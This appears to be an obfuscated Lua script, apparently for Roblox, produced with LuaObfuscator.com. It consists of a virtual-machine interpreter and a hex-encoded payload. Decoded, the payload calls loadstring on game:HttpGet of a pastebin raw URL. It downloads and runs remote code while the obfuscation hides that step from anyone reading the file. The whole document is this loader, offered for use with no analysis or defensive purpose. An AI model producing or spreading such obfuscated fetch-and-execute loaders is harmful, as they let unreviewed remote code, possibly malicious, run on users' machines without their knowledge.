--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v104=v5(v82,v19);v19=nil;return v104;else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==0) then v84=(v31/(2^(v32-(2 -1))))%((3 -(878 -(282 + 595)))^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v84-(v84%((2569 -(1523 + 114)) -(857 + 74))) ;end end else local v85=(570 -(330 + 37 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and ((1 -0) + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1065 -(68 + 997) ;local v36;local v37;while true do if (v35==(1271 -(226 + 1044))) then return (v37 * (1114 -858)) + v36 ;end if (v35==((1074 -(892 + 65)) -(32 + 85))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;v35=1 + 0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v41 * 16777216) + (v40 * 65536) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=(1773 -(630 + 793)) -(87 + 263) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(181 -(67 + 113))) then v45=1 + 0 ;v46=(v20(v44,1,67 -47 ) * ((4 -(9 -7))^(24 + 8))) + v43 ;v42=7 -5 ;end if (v42==((377 + 578) -(802 + 150))) then if (v47==((0 -0) -0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1 + 0 ;v45=0 + 0 ;end elseif (v47==(3185 -(116 + 1022))) then return ((v46==(997 -(915 + 82))) and (v48 * (((1749 -(760 + 987)) -1)/((1080 -(1020 + 60)) + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1344 -321) ) * (v45 + (v46/((1189 -(1069 + 118))^(127 -75)))) ;end if (v42==(4 -2)) then v47=v20(v44,21,67 -36 );v48=((v20(v44,6 + 26 )==(1 -0)) and  -(1 + 0)) or (792 -(368 + 423)) ;v42=9 -6 ;end if (v42==(18 -(10 + 8))) then v43=v23();v44=v23();v42=1 -0 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1914 -(1789 + (273 -149)))) then v51=v3(v16,v18,(v18 + v49) -(767 -(745 + 21)) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==(8 -5)) then return v6(v52);end if (v50==(5 -3)) then v52={};for v94=(17 -(9 + 5)) -2 , #v51 do v52[v94]=v2(v1(v3(v51,v94,v94)));end v50=1 + (378 -(85 + 291)) ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=1056 -((1352 -(243 + 1022)) + 968) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 + 0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v53~=(2 -1)) then else local v89=(function() return 0 -0 ;end)();local v90=(function() return;end)();while true do if (v89==0) then v90=(function() return 241 -(187 + 54) ;end)();while true do if (1~=v90) then else v60=(function() return {};end)();for v144= #"<",v59 do local v145=(function() return 0;end)();local v146=(function() return;end)();local v147=(function() return;end)();local v148=(function() return;end)();while true do if (v145~=(780 -(162 + 618))) then else v146=(function() return 0 + 0 ;end)();v147=(function() return nil;end)();v145=(function() return 1 + 0 ;end)();end if ((1 -0)==v145) then v148=(function() return nil;end)();while true do if (v146==1) then if (v147== #".") then v148=(function() return v21()~=(0 -0) ;end)();elseif (v147==2) then v148=(function() return v24();end)();elseif (v147== #"gha") then v148=(function() return v25();end)();end v60[v144]=(function() return v148;end)();break;end if (0==v146) then v147=(function() return v21();end)();v148=(function() return nil;end)();v146=(function() return 1 + 0 ;end)();end end break;end end end v90=(function() return 1638 -(1373 + 263) ;end)();end if (v90==2) then v53=(function() return 1002 -(451 + 549) ;end)();break;end if (v90==(0 + 0)) then v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v90=(function() return 1;end)();end end break;end end end if (v53==(2 -0)) then v58[ #"xnx"]=(function() return v21();end)();for v96= #"|",v23() do local v97=(function() return 0 -0 ;end)();local v98=(function() return;end)();while true do if (v97==(1384 -(746 + 638))) then v98=(function() return v21();end)();if (v20(v98, #",", #".")~=0) then else local v138=(function() return 0 + 0 ;end)();local v139=(function() return;end)();local v140=(function() return;end)();local v141=(function() return;end)();while true do if (v138~=(2 -0)) then else if (v20(v140, #"]", #"[")== #"/") then v141[2]=(function() return v60[v141[343 -(218 + 123) ]];end)();end if (v20(v140,2,1583 -(1535 + 46) )== #" ") then v141[ #"19("]=(function() return v60[v141[ #"-19"]];end)();end v138=(function() return 3;end)();end if (v138~=(3 + 0)) then else if (v20(v140, #"gha", #"xnx")~= #"/") then else v141[ #"xnxx"]=(function() return v60[v141[ #"http"]];end)();end v55[v96]=(function() return v141;end)();break;end if (v138==1) then v141=(function() return {v22(),v22(),nil,nil};end)();if (v139==0) then local v170=(function() return 0;end)();local v171=(function() return;end)();while true do if (v170==0) then v171=(function() return 0 + 0 ;end)();while true do if ((560 -(306 + 254))~=v171) then else v141[ #"-19"]=(function() return v22();end)();v141[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v139== #"[") then v141[ #"19("]=(function() return v23();end)();elseif (v139==(1 + 1)) then v141[ #"-19"]=(function() return v23() -((3 -1)^16) ;end)();elseif (v139== #"xxx") then local v178=(function() return 1467 -(899 + 568) ;end)();local v179=(function() return;end)();while true do if (v178~=0) then else v179=(function() return 0;end)();while true do if (v179==(0 + 0)) then v141[ #"xnx"]=(function() return v23() -(2^16) ;end)();v141[ #"0313"]=(function() return v22();end)();break;end end break;end end end v138=(function() return 4 -2 ;end)();end if (v138~=0) then else local v161=(function() return 603 -(268 + 335) ;end)();while true do if (v161==(291 -(60 + 230))) then v138=(function() return 573 -(426 + 146) ;end)();break;end if (v161==0) then v139=(function() return v20(v98,2, #"gha");end)();v140=(function() return v20(v98, #"http",1 + 5 );end)();v161=(function() return 1;end)();end end end end end break;end end end for v99= #":",v23() do v56,v99,v28=(function() return v54(v56,v99,v28);end)();end return v58;end if (v53~=0) then else local v92=(function() return 1456 -(282 + 1174) ;end)();local v93=(function() return;end)();while true do if (v92==0) then v93=(function() return 811 -(569 + 242) ;end)();while true do if (2~=v93) then else v53=(function() return 1;end)();break;end if (v93==(2 -1)) then v56=(function() return {};end)();v57=(function() return {};end)();v93=(function() return 1 + 1 ;end)();end if (v93~=(1024 -(706 + 318))) then else v54=(function() return function(v149,v150,v151) local v152=(function() return 0;end)();local v153=(function() return;end)();while true do if (v152~=(1251 -(721 + 530))) then else v153=(function() return 0;end)();while true do if (v153==0) then local v174=(function() return 0;end)();while true do if ((1271 -(945 + 326))~=v174) then else local v180=(function() return 0;end)();while true do if (0==v180) then v149[v150-#"]" ]=(function() return v151();end)();return v149,v150,v151;end end end end end end break;end end end;end)();v55=(function() return {};end)();v93=(function() return 2 -1 ;end)();end end break;end end end end end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[740 -(542 + 196) ];local v66=v61[6 -3 ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1 + 0 ;local v72= -(701 -(271 + 429));local v73={};local v74={...};local v75=v12("#",...) -(1501 -(1408 + 92)) ;local v76={};local v77={};for v86=1613 -(1565 + 48) ,v75 do if ((2357==2357) and (v86>=v69)) then v73[v86-v69 ]=v74[v86 + (1087 -(461 + 625)) ];else v77[v86]=v74[v86 + (1552 -(1126 + 425)) ];end end local v78=(v75-v69) + (1289 -(993 + 295)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=(1 + 2)) then if (v80<=(1172 -(418 + 753))) then if (v80>(0 + 0)) then v77[v79[1 + 1 ]]=v63[v79[1 + 2 ]];else local v107=v79[1 + 1 ];v77[v107]=v77[v107](v13(v77,v107 + (530 -(406 + 123)) ,v72));end elseif (v80==((1094 + 677) -(1749 + 20))) then do return;end else local v109=0 + 0 ;local v110;local v111;local v112;local v113;while true do if ((123==123) and (0==v109)) then v110=v79[(3257 -(565 + 1368)) -(1249 + 73) ];v111,v112=v70(v77[v110](v13(v77,v110 + 1 + 0 ,v79[(2286 -(782 + 356)) -(466 + 679) ])));v109=2 -1 ;end if (v109==(2 -1)) then v72=(v112 + v110) -(1901 -(106 + 1794)) ;v113=0 + 0 ;v109=1 + (268 -(176 + 91)) ;end if (v109==(7 -5)) then for v162=v110,v72 do v113=v113 + ((4 -2) -1) ;v77[v162]=v111[v113];end break;end end end elseif ((v80<=(13 -(11 -3))) or (1871<636) or (1056>=3392)) then if ((v80==(118 -(4 + 110))) or (4061<2572) or (1081<1075)) then v77[v79[5 -3 ]]();else v77[v79[586 -(57 + 527) ]]=v79[6 -3 ];end elseif (v80>(1433 -(41 + 1386))) then local v116=(1764 -(1477 + 184)) -(17 + 86) ;local v117;local v118;while true do if (((1881>=1293) and (v116==(1 + (0 -0)))) or (1049>=4432)) then v77[v117 + 1 + 0 ]=v118;v77[v117]=v118[v79[8 -4 ]];break;end if ((v116==((856 -(564 + 292)) -(1092 -(975 + 117)))) or (4768<=846)) then v117=v79[168 -(122 + 44) ];v118=v77[v79[5 -2 ]];v116=1 -0 ;end end else local v119;local v120,v121;local v122;local v123;v77[v79[6 -4 ]]=v63[v79[(1878 -(157 + 1718)) + 0 ]];v71=v71 + 1 + (0 -0) ;v79=v67[v71];v77[v79[3 -1 ]]=v63[v79[3]];v71=v71 + (66 -(30 + 35)) ;v79=v67[v71];v123=v79[2 + 0 ];v122=v77[v79[1260 -(1043 + 214) ]];v77[v123 + ((3 + 0) -2) ]=v122;v77[v123]=v122[v79[242 -(64 + 174) ]];v71=v71 + (1213 -((627 -(244 + 60)) + 684 + 205)) ;v79=v67[v71];v77[v79[1 + 1 ]]=v79[(483 -(41 + 435)) -(1022 -(697 + 321)) ];v71=v71 + (581 -((983 -622) + 219)) ;v79=v67[v71];v123=v79[322 -(53 + 267) ];v120,v121=v70(v77[v123](v13(v77,v123 + 1 + 0 ,v79[416 -(15 + 398) ])));v72=(v121 + v123) -((1984 -(938 + 63)) -(18 + 964)) ;v119=0 + 0 + (0 -0) ;for v142=v123,v72 do local v143=0 -0 ;while true do if (v143==(0 + (1125 -(936 + 189)))) then v119=v119 + (2 -1) + 0 + 0 ;v77[v142]=v120[v119];break;end end end v71=v71 + (2 -1) ;v79=v67[v71];v123=v79[2 + 0 + 0 ];v77[v123]=v77[v123](v13(v77,v123 + (851 -(20 + 830)) ,v72));v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1977 -(1913 + 62) ]]();v71=v71 + 1 + 0 ;v79=v67[v71];do return;end end v71=v71 + (127 -(116 + 10)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F315257735645346B00083Q0012063Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
